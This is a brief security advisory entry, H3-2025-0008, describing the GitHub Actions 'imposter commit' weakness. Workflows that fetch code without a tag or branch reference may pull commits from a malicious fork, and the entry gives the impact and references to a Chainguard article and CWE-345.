H3-2025-0008¶

GitHub Actions Imposter Commit

Description¶

GitHub Actions workflows that fetch code from repositories without a tag or branch reference may inadvertently fetch commits from a malicious fork rather than the parent repository. This unapproved code may be malicious.

Impact¶

An attacker may exploit this weakness to obtain remote code execution in the context of the GitHub Actions workflow.

References¶

• Chainguard Article
• CWE-345: Insufficient Verification of Data Authenticity